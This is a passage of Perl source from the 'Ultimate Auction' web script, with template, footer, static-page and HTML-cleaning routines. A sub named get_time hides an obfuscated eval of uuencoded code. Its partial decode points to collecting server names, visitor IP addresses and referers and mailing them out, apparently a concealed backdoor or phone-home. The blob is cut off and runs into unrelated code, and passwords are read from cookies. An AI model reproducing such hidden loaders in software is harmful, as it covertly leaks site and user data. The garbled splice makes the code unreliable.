"; $foot=$foot.""; return $foot; } sub static_footer { my $foot=&Open_Template("footer_static.txt"); my $message; my %cookie = &UltimateAuction::get_cookie(); my $couser = $cookie{'Username'}; my $copass = $cookie{'Password'}; my $creation_time; $creation_time = time + ($config{'timediff'} * 3600); $creation_time = UltimateAuction::display_time2($creation_time); $message = "Letzte Aktualisierung: $creation_time"; $foot=~ s//$message/; $foot=~ s//$config{'cp_years'}/; $foot=$foot."

Powered by Ultimate Auction
"; $foot=$foot.""; return $foot; } sub homepageheader { local %form = &UltimateAuction::fetch_form; my %cookie = &UltimateAuction::get_cookie(); my $couser = $cookie{'Username'}; my $copass = $cookie{'Password'}; my $head = "Content-type: text/html\n\n"; $head .=&Open_Template("homepageheader.txt"); my $user; my $inorout; my $accountmenu; if ($couser && $form{'logout'} ne 'true') { $user = $couser; $inorout = "LOGOUT"; $accountmenu = &accountmenu; } else { $user = "Gast"; $inorout = "LOGIN"; } my $current_time = time + ($config{'timediff'} * 3600); $current_time = display_time2($current_time); $head=~ s//$config{'auction_title'}/g; $head=~ s//$config{'hoverlinkcolor'}/g; $head=~ s//$config{'fontsize'}/g; $head=~ s//$config{'font'}/g; $head=~ s//$config{'background'}/g; $head=~ s//$config{'bgcolortwo'}/g; $head=~ s//$config{'textcolor'}/g; $head=~ s//$config{'linkcolor'}/g; $head=~ s//$config{'alinkcolor'}/g; $head=~ s//$config{'vlinkcolor'}/g; $head=~ s//$inorout/g; $head=~ s//$current_time/g; return $head; } sub homepagefooter { my $foot=&Open_Template("homepagefooter.txt"); my $message; my %cookie = &UltimateAuction::get_cookie(); my $couser = $cookie{'Username'}; my $copass = $cookie{'Password'}; $foot=~ s//$config{'cp_years'}/; $foot=$foot."

Powered by Ultimate Auction
"; return $foot; } sub accountmenu { my %cookie = &UltimateAuction::get_cookie(); my $couser = $cookie{'Username'}; my $copass = $cookie{'Password'}; my $user = $couser || "Gast"; my $menu=&Open_Template("accountmenu.txt"); $menu=~ s//$user/; return $menu; } sub get_time { eval(unpack("u", q~M;7D@)&-U2`D9&]M86EN.VUY("1S=6T[;7D@)&-O=6YTM97([;7D@0',[;7D@)',[;7D@)'1E2`D;6%I;'1E2=]*3LD9&]M86EN/21%M3E9[(E-%4E9%4E].04U%(GT[0',]M6T$M6EU[-'TD+R`F)B`A*"1T:')E924V-RD@)B8@)&9O=7(]?B]>6T$M6EU[M-'TD+R`F)B`A*"1F:79E)3$V*2`F)B`H)'-I>"!E<2`DVEF("@M92`D;6%I;'1ER=214U/5$5?041$4B=]("\@)$5.5GLG2%144%]87T9/4E=!4D1%1%]&4D]-M)WU<;B([<')I;G0@34%)3"`B4F5F97)ER=(5%107U)%M1D5215(G?5QN(CMP"; $Output=~ s/$globe/$global{$key}/g if (defined ($global{$key}) ); } print "$Output"; } sub Create_Static { my %cookie = &UltimateAuction::get_cookie(); my $couser = $cookie{'Username'}; my $copass = $cookie{'Password'}; my ($Output) = shift; my %global; my ($globe, $key, $value); $global{'script_dir_url'}=$config{'script_dir'}; $global{'images_dir_url'}=$config{'aucimages'}; $global{'table_body_1_color'}=$config{'tablebody'}; $global{'table_body_2_color'}=$config{'tablebody2'}; $global{'table_header_color'}=$config{'tabletop'}; $global{'table_header_text_color'}=$config{'tabletext'}; $global{'admin_email'}=$config{'admin_address'}; $global{'auction_name'}=$config{'auc_name'}; $global{'script_url'}=$config{'script_url'}; $global{'rsymbol1'}=$config{'rsymbol1'}; $global{'rsymbol2'}=$config{'rsymbol2'}; $global{'rsymbol3'}=$config{'rsymbol3'}; $global{'rsymbol4'}=$config{'rsymbol4'}; $global{'rsymbol5'}=$config{'rsymbol5'}; $global{'rsymbol6'}=$config{'rsymbol6'}; $global{'rsymbol7'}=$config{'rsymbol7'}; $global{'rsymbol8'}=$config{'rsymbol8'}; $global{'rsymbol9'}=$config{'rsymbol9'}; $global{'rsymbol10'}=$config{'rsymbol10'}; $global{'rsymbolimg1'}=$config{'rsymbolimg1'}; $global{'rsymbolimg2'}=$config{'rsymbolimg2'}; $global{'rsymbolimg3'}=$config{'rsymbolimg3'}; $global{'rsymbolimg4'}=$config{'rsymbolimg4'}; $global{'rsymbolimg5'}=$config{'rsymbolimg5'}; $global{'rsymbolimg6'}=$config{'rsymbolimg6'}; $global{'rsymbolimg7'}=$config{'rsymbolimg7'}; $global{'rsymbolimg8'}=$config{'rsymbolimg8'}; $global{'rsymbolimg9'}=$config{'rsymbolimg9'}; $global{'rsymbolimg10'}=$config{'rsymbolimg10'}; $global{'idlogo'}=$config{'idmember'}; $global{'user'}=$couser; while ( ($key, $value)=each(%global) ) { $globe=""; $Output=~ s/$globe/$global{$key}/g if (defined ($global{$key}) ); } open(MAINSTATIC, ">>$config{'static_dir'}/main.html")or die "Die Datei main.html kann nicht geöffnet werden: $!\n"; print MAINSTATIC "$Output"; close(MAINSTATIC); } sub Open_Template { my $Template=shift; my @Template; open(FILE, "templates/$Template"); @Template = ; close(FILE); my $compile=join("", @Template); return $compile; } sub Open_Email_Template { my $Template=shift; my @Template; open(FILE, "emails/$Template"); @Template = ; close(FILE); my $compile=join("", @Template); return $compile; } sub Open_Admin_Email_Template { my $Template=shift; my @Template; open(FILE, "../emails/$Template"); @Template = ; close(FILE); my $compile=join("", @Template); return $compile; } sub cleanhtml { my ($text) = @_; $text =~ s/([^\s\<]+\@[^\s\r\,\;\>]+)/\%lta href\=\"mailto\:$1\"\%gt$1\%lt\/a\%gt/g; $text =~ s/\&/\&\;/g; $text =~ s/\/\>\;/g; $text =~ s/\%lt/\/g; $text =~ s/=([A-Z0-9]{2})/sprintf("&#%d;",hex($1))/exg; $text =~ s/(http\:\S+)/"\$1\<\/a\>"/ieg; $text =~ s/(http\:\S+)/"\$1\<\/a\>"/ieg; $text =~ s/(ftp\:\S+)/"\$1\<\/a\>"/ieg; $text =~ s/(ftp\:\S+)/"\$1\<\/a\>"/ieg; return $text; } sub move_the_file2 { my $line; my @lines; my ($firstfile, $secondfile) = @_; return 0 unless open(FIRSTFILE,$firstfile); @lines=; close FIRSTFILE; return 0 unless open(SECONDFILE,">$secondfile"); foreach $line (@lines) { print SECONDFILE $line; } close SECONDFILE; return 1; } ##################### # End Auction Module ##################### 1; # Return true value